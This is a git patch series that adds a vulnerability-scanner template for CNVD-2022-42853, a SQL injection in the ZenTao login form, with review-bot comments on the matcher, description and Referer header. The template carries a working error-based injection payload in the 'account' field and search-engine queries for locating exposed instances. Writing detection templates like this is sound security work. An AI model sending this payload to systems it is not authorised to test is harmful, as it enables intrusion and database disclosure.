From b620e950ffc48f0a438fdb094d34887372a5f971 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 6 Sep 2022 11:03:38 +0530
Subject: [PATCH 1/5] Create CNVD-2022-42853.yaml
---
 cnvd/2022/CNVD-2022-42853.yaml | 35 ++++++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 cnvd/2022/CNVD-2022-42853.yaml
diff --git a/cnvd/2022/CNVD-2022-42853.yaml b/cnvd/2022/CNVD-2022-42853.yaml
new file mode 100644
index 0000000000..8c31589f12
--- /dev/null
+++ b/cnvd/2022/CNVD-2022-42853.yaml
@@ -0,0 +1,35 @@
+id: CNVD-2022-42853
+
+info:
+ name: ZenTao CMS - SQL Injection
+ author: ling
+ severity: high
+ reference:
+ - https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go
+ - https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853
+ classification:
+ cve-id: CNVD-2022-42853
+ metadata:
+ verified: true
+ shodan-query: http.title:"zentao"
+ fofa-query: "Zentao"
+ tags: cnvd,cnvd2022,zentao,sqli
+
+variables:
+ num: "999999999"
+
+requests:
+ - raw:
+ - |
+ POST /zentao/user-login.html HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Referer: http://{{Hostname}}/zentao/user-login.html
+
+ account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'c8c605999f3d8352d7bb792cf3fdb25'
From 82c24613f1b060828e34e5d6b50f33c9b0679217 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 6 Sep 2022 11:06:47 +0530
Subject: [PATCH 2/5] Update CNVD-2022-42853.yaml
---
 cnvd/2022/CNVD-2022-42853.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cnvd/2022/CNVD-2022-42853.yaml b/cnvd/2022/CNVD-2022-42853.yaml
index 8c31589f12..11dbc88403 100644
--- a/cnvd/2022/CNVD-2022-42853.yaml
+++ b/cnvd/2022/CNVD-2022-42853.yaml
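Review bot: The only matcher in the new template is the literal `'c8c605999f3d8352d7bb792cf3fdb25'`, which is 31 hex characters rather than a full MD5, and nothing in the file says how it relates to `num`. If the value is the MD5 of `num` with its last character dropped because the database error text is length-limited (an inference from the payload, not something the template states), a maintainer who edits `num` or "completes" the hash turns the template into a silent false negative. A comment above `words:` such as `# md5(num) as echoed in the DB error, last hex char cut off by the error-length limit; recompute if num changes` would record that coupling. Separately, the request path hard-codes the `/zentao/` prefix, so installs served from another path will report clean without having been tested; that limit is worth stating in the template's `info` block.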
@@ -1,14 +1,14 @@ id: CNVD-2022-42853 info: - name: ZenTao CMS - SQL Injection + name: ZenTao CMS - SQL Injection author: ling severity: high reference: - https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go - https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853 classification: - cve-id: CNVD-2022-42853 + cve-id: CNVD-2022-42853 metadata: verified: true shodan-query: http.title:"zentao" From a2da0ed46da611e6ed3e0487969c2f001ec9196b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Sep 2022 11:12:15 +0530 Subject: [PATCH 3/5] Update CNVD-2022-42853.yaml --- cnvd/2022/CNVD-2022-42853.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cnvd/2022/CNVD-2022-42853.yaml b/cnvd/2022/CNVD-2022-42853.yaml index 11dbc88403..10e92b6975 100644 --- a/cnvd/2022/CNVD-2022-42853.yaml +++ b/cnvd/2022/CNVD-2022-42853.yaml @@ -20,13 +20,13 @@ variables: requests: - raw: - - | - POST /zentao/user-login.html HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Referer: http://{{Hostname}}/zentao/user-login.html + - | + POST /zentao/user-login.html HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: http://{{Hostname}}/zentao/user-login.html - account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1 + account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1 matchers: - type: word From 94333dd726e562e088a867d5f883050adc426c39 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Sep 2022 19:00:13 +0530 Subject: [PATCH 4/5] Update CNVD-2022-42853.yaml --- cnvd/2022/CNVD-2022-42853.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cnvd/2022/CNVD-2022-42853.yaml b/cnvd/2022/CNVD-2022-42853.yaml index 10e92b6975..9f50f90f89 100644 --- a/cnvd/2022/CNVD-2022-42853.yaml +++ b/cnvd/2022/CNVD-2022-42853.yaml 
@@ -4,11 +4,11 @@ info: name: ZenTao CMS - SQL Injection author: ling severity: high + description: | + Zen Tao has a SQL injection vulnerability. Attackers can exploit the vulnerability to obtain sensitive database information. reference: - https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go - https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853 - classification: - cve-id: CNVD-2022-42853 metadata: verified: true shodan-query: http.title:"zentao" From 4a070fe725c5b816ab4715919ef9d02659940fec Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 9 Sep 2022 16:40:51 +0530 Subject: [PATCH 5/5] Update CNVD-2022-42853.yaml --- cnvd/2022/CNVD-2022-42853.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cnvd/2022/CNVD-2022-42853.yaml b/cnvd/2022/CNVD-2022-42853.yaml index 9f50f90f89..76423cf563 100644 --- a/cnvd/2022/CNVD-2022-42853.yaml +++ b/cnvd/2022/CNVD-2022-42853.yaml @@ -24,7 +24,7 @@ requests: POST /zentao/user-login.html HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Referer: http://{{Hostname}}/zentao/user-login.html + Referer: {{BaseURL}}/zentao/user-login.html account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1
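Review bot: The added `description` gives no affected versions and no fix, so a hit from this template tells the operator that the login form is injectable but not what to upgrade to. A line next to it such as `remediation: Upgrade ZenTao to a release that fixes CNVD-2022-42853 (version per the vendor/CNVD advisory).` would close that gap. The text also writes "Zen Tao" where `name` uses "ZenTao". With `classification` removed entirely the template no longer carries a weakness class; `classification:` with `cwe-id: CWE-89` would keep it filterable without reusing the CNVD number as a CVE id.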
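Review bot: `{{BaseURL}}` expands to the target URL as supplied, including any path, whereas the request line in this raw block is the fixed `/zentao/user-login.html`; for a target entered with a path, the Referer will name a page other than the one requested. `Referer: {{RootURL}}/zentao/user-login.html` keeps the scheme and port correction this change is after and stays consistent with the request line. Whether ZenTao checks the Referer at all is not visible here, so this matters mainly if the header is needed for the check to reach the login handler. The raw request block opens above the hunk.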